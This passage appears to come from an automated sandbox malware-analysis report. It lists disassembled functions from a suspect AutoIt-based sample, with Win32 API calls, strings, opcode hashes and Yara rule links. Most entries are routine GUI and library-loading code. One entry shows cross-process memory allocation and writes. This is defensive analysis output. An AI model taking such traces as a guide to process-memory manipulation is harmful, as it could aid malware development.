                                                  • Instruction Fuzzy Hash: 69F04F71200304AFEB110FA5ECC8F6F3BACFF49754F00002AF999D6160CA619986DA60
                                                  Function 00C4C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 00C4C1F7
                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00C4C20E
                                                  • MessageBeep.USER32(00000000), ref: 00C4C226
                                                  • KillTimer.USER32(?,0000040A), ref: 00C4C242
                                                  • EndDialog.USER32(?,00000001), ref: 00C4C25C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                  • String ID:
                                                  • API String ID: 3741023627-0
                                                  • Opcode ID: 16a9e946d8ed10510a7516b4cad9edda8caed5698fd465a21d54f26cb1aa01f3
                                                  • Instruction ID: c35526d296e966050ed00653b9c300ef3e5eb6033bd0af9da78cc69788804562
                                                  • Opcode Fuzzy Hash: 16a9e946d8ed10510a7516b4cad9edda8caed5698fd465a21d54f26cb1aa01f3
                                                  • Instruction Fuzzy Hash: C801A230504704ABEB705B60ED8EFAA77B8BB00B06F00026DB556A14F1DBE469858B90
                                                  Function 00BF13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EndPath.GDI32(?), ref: 00BF13BF
                                                  • StrokeAndFillPath.GDI32(?,?,00C2B888,00000000,?), ref: 00BF13DB
                                                  • SelectObject.GDI32(?,00000000), ref: 00BF13EE
                                                  • DeleteObject.GDI32 ref: 00BF1401
                                                  • StrokePath.GDI32(?), ref: 00BF141C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                  • String ID:
                                                  • API String ID: 2625713937-0
                                                  • Opcode ID: d6825d2c50d58c74979b559f65966150ef5e85230b46623d949ea3c9bd8f7d22
                                                  • Instruction ID: 1cada085aed074cf616e3bd26915ad09b1d94529a50e7d7bb84aa7ee6093c3f6
                                                  • Opcode Fuzzy Hash: d6825d2c50d58c74979b559f65966150ef5e85230b46623d949ea3c9bd8f7d22
                                                  • Instruction Fuzzy Hash: D1F0C930044A08EBDB125F2AEC8D76C3BE5E741326F088768E56D991F1C732499ADF50
                                                  Function 00C02CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C10DB6: std::exception::exception.LIBCMT ref: 00C10DEC
                                                    • Part of subcall function 00C10DB6: __CxxThrowException@8.LIBCMT ref: 00C10E01
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00BF7A51: _memmove.LIBCMT ref: 00BF7AAB
                                                  • __swprintf.LIBCMT ref: 00C02ECD
                                                  Strings
                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00C02D66
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                  • API String ID: 1943609520-557222456
                                                  • Opcode ID: d0a38adb24668e93fdf775de012079f69fc719f607d63a1ee32a376c8a5f7474
                                                  • Instruction ID: f0d93ad0eb76bd00c2880aa7caa6b510f34b6e85911effaff253b7471dc7b4eb
                                                  • Opcode Fuzzy Hash: d0a38adb24668e93fdf775de012079f69fc719f607d63a1ee32a376c8a5f7474
                                                  • Instruction Fuzzy Hash: 95916C71118205AFCB14EF28C889C7FB7E8EF85714F00495DF5969B2A1DA70EE48DB52
                                                  Function 00C5B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF4743,?,?,00BF37AE,?), ref: 00BF4770
                                                  • CoInitialize.OLE32(00000000), ref: 00C5B9BB
                                                  • CoCreateInstance.OLE32(00C82D6C,00000000,00000001,00C82BDC,?), ref: 00C5B9D4
                                                  • CoUninitialize.OLE32 ref: 00C5B9F1
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                  • String ID: .lnk
                                                  • API String ID: 2126378814-24824748
                                                  • Opcode ID: bdec235ca2a480aed551672537dce64409a5afdd88324c68b841a2d15676c35a
                                                  • Instruction ID: cd2095ee7c4693582c4e80c002e78eaa390e3ef9eddf7891342a878e437c90dd
                                                  • Opcode Fuzzy Hash: bdec235ca2a480aed551672537dce64409a5afdd88324c68b841a2d15676c35a
                                                  • Instruction Fuzzy Hash: 5DA16B756043059FC700DF14C884E2ABBE5FF89314F148998F9A99B3A2CB31ED89CB91
                                                  Function 00C1501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __startOneArgErrorHandling.LIBCMT ref: 00C150AD
                                                    • Part of subcall function 00C200F0: __87except.LIBCMT ref: 00C2012B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorHandling__87except__start
                                                  • String ID: pow
                                                  • API String ID: 2905807303-2276729525
                                                  • Opcode ID: a87302e7bcdd165a2e5dc6616a54d68159c08f2d9da793ca7019523c915f97be
                                                  • Instruction ID: bb8067d7efdb1ba294a791deb4df28c65b84442db85820e5080e9621a6c63c78
                                                  • Opcode Fuzzy Hash: a87302e7bcdd165a2e5dc6616a54d68159c08f2d9da793ca7019523c915f97be
                                                  • Instruction Fuzzy Hash: E3517E71A0C502D6DB11B764D9013BE2B94EB82700F308D5BE4E5866ABEF358FD4B786
                                                  Function 00C06192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _memset$_memmove
                                                  • String ID: ERCP
                                                  • API String ID: 2532777613-1384759551
                                                  • Opcode ID: 35287405c2a0225dc53b1264cf693a9fcb039e8148ce90c652d9901cdfd31bbc
                                                  • Instruction ID: b11d6232128e4720b111337293e9b8ae2a54f2de6f072e087d1155600e8d762d
                                                  • Opcode Fuzzy Hash: 35287405c2a0225dc53b1264cf693a9fcb039e8148ce90c652d9901cdfd31bbc
                                                  • Instruction Fuzzy Hash: F951B271900706DBDB24CF65C941BAAB7F4FF04304F20456EE95ADB291E770EA94DB80
                                                  Function 00C497F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C514BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C49296,?,?,00000034,00000800,?,00000034), ref: 00C514E6
                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C4983F
                                                    • Part of subcall function 00C51487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C492C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00C514B1
                                                    • Part of subcall function 00C513DE: GetWindowThreadProcessId.USER32(?,?), ref: 00C51409
                                                    • Part of subcall function 00C513DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C4925A,00000034,?,?,00001004,00000000,00000000), ref: 00C51419
                                                    • Part of subcall function 00C513DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C4925A,00000034,?,?,00001004,00000000,00000000), ref: 00C5142F
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C498AC
                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C498F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                  • String ID: @
                                                  • API String ID: 4150878124-2766056989
                                                  • Opcode ID: 67367ce4927a3964409857b8b03f790f6b702ffa8e5334164e90eb7389592d3a
                                                  • Instruction ID: e5f11b16bed77358d1309277ffeec0b58534c66bbcdda8ef4f1a95c88aef0ccc
                                                  • Opcode Fuzzy Hash: 67367ce4927a3964409857b8b03f790f6b702ffa8e5334164e90eb7389592d3a
                                                  • Instruction Fuzzy Hash: B4413C7690021CBEDB10DFA4CC85BDEBBB8EB09700F044199FA55B7191DA716E89DBA0
                                                  Function 00C77946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00C7F910,00000000,?,?,?,?), ref: 00C779DF
                                                  • GetWindowLongW.USER32 ref: 00C779FC
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C77A0C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Long
                                                  • String ID: SysTreeView32
                                                  • API String ID: 847901565-1698111956
                                                  • Opcode ID: 93ae13da18a087b2bc086de3824d1e8ce34002aa6ba0989d7bbd0ef8aa2f206a
                                                  • Instruction ID: 80a006d0df4784062d62d424234d2bed0340bc6681073be454e12218d0535471
                                                  • Opcode Fuzzy Hash: 93ae13da18a087b2bc086de3824d1e8ce34002aa6ba0989d7bbd0ef8aa2f206a
                                                  • Instruction Fuzzy Hash: 4D31B03120520AAFDB118F38DC41BEA77A9EB45334F208725F979A32E0D731EE519B50
                                                  Function 00C773D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C77461
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C77475
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C77499
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: SysMonthCal32
                                                  • API String ID: 2326795674-1439706946
                                                  • Opcode ID: 17f077bd6a55cf1a59e0f90b0f1d546796bfa22ed3837d8ff9cc4355201916d3
                                                  • Instruction ID: 00fcebc75a35cef956b952bc71ffcf43b1d2391256489fb2e99762751a5ed416
                                                  • Opcode Fuzzy Hash: 17f077bd6a55cf1a59e0f90b0f1d546796bfa22ed3837d8ff9cc4355201916d3
                                                  • Instruction Fuzzy Hash: 19219F3260021DABDF118EA4CC46FEA3B79EF48724F114254FE196B190DA75AC95DBA0
                                                  Function 00C77B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C77C4A
                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C77C58
                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C77C5F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DestroyWindow
                                                  • String ID: msctls_updown32
                                                  • API String ID: 4014797782-2298589950
                                                  • Opcode ID: f5752aa199930d18c94f9094d589cbb6ec861d5c55ec51879af10a3f613428d4
                                                  • Instruction ID: 0fac4b9f5fbdc64bb9c1ac59673e1b0860d9a9f0ee1dc61cf11343dcfc75766b
                                                  • Opcode Fuzzy Hash: f5752aa199930d18c94f9094d589cbb6ec861d5c55ec51879af10a3f613428d4
                                                  • Instruction Fuzzy Hash: FD218EB5604208AFDB11DF28DCC1EAA37ECEF4A354B144559FA199B3A1CB32EC518A60
                                                  Function 00C76CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C76D3B
                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C76D4B
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C76D70
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$MoveWindow
                                                  • String ID: Listbox
                                                  • API String ID: 3315199576-2633736733
                                                  • Opcode ID: 70a0e333e516c25f86569d2c0e144efa313ef9225bcd6d322fa6b4e520a500e6
                                                  • Instruction ID: 02bbf94eb4f875ddda271a1be33f14883939d89385fc97ea5230d93550cead50
                                                  • Opcode Fuzzy Hash: 70a0e333e516c25f86569d2c0e144efa313ef9225bcd6d322fa6b4e520a500e6
                                                  • Instruction Fuzzy Hash: 83219532610118BFDF228F54CC45FBB37BAEF89754F11C128F9599B1A0C6719C519BA0
                                                  Function 00C7770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C77772
                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C77787
                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C77794
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: msctls_trackbar32
                                                  • API String ID: 3850602802-1010561917
                                                  • Opcode ID: 2766b096f966807a39e0600c1d28bb105e3b6b564d4c9d1abeb3bb3bc0f5970c
                                                  • Instruction ID: 89c50c871d7213f1812ef78a54223658bac86c9c87b748938c15ca2a0e079c88
                                                  • Opcode Fuzzy Hash: 2766b096f966807a39e0600c1d28bb105e3b6b564d4c9d1abeb3bb3bc0f5970c
                                                  • Instruction Fuzzy Hash: 8C11273220020CBFEF255F65CC01FEB37A8EF88B54F018628F655A6090C671E811CB20
                                                  Function 00BF4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BF4B83,?), ref: 00BF4C44
                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BF4C56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-1355242751
                                                  • Opcode ID: 3299905d89053558361366904747373e113909cc23e62fb1cb524ddc41b02328
                                                  • Instruction ID: f9febc5b79a91d083ece6add743690d1d96e87f8e4a8fe8e7226f31a2b224741
                                                  • Opcode Fuzzy Hash: 3299905d89053558361366904747373e113909cc23e62fb1cb524ddc41b02328
                                                  • Instruction Fuzzy Hash: BBD0E231910713CFD7209B31D98871A76E5EF05391B51D87ED59AD6160EB70D880CA50
                                                  Function 00BF4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BF4BD0,?,00BF4DEF,?,00CB52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00BF4C11
                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BF4C23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                  • API String ID: 2574300362-3689287502
                                                  • Opcode ID: 259cf8a3d3c757940cdc81dfc23905d928449d309966da1c4378676e736c2479
                                                  • Instruction ID: b9abe626495882d0bbe18348dcfe20c406d17dd0db888f9a6a88853371d32be8
                                                  • Opcode Fuzzy Hash: 259cf8a3d3c757940cdc81dfc23905d928449d309966da1c4378676e736c2479
                                                  • Instruction Fuzzy Hash: 99D08230900713CFC720AB74C88830BBAE5EF09382B00C83ED58AC2560E7B0C881CA10
                                                  Function 00C70DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00C71039), ref: 00C70DF5
                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00C70E07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                  • API String ID: 2574300362-4033151799
                                                  • Opcode ID: 642a1ae615c503f86f3fd405fa365428b58b42fd25a7832722969f51f455c927
                                                  • Instruction ID: a1e918b5e14fe3c3355013a796afebb5a0adad9fa7c514ffbf0472b6b1d34309
                                                  • Opcode Fuzzy Hash: 642a1ae615c503f86f3fd405fa365428b58b42fd25a7832722969f51f455c927
                                                  • Instruction Fuzzy Hash: 4CD0C730800323CFC3208F70C84A38AB6E4AF02382F20CC3E94DAC6150E6B0D8D0CB00
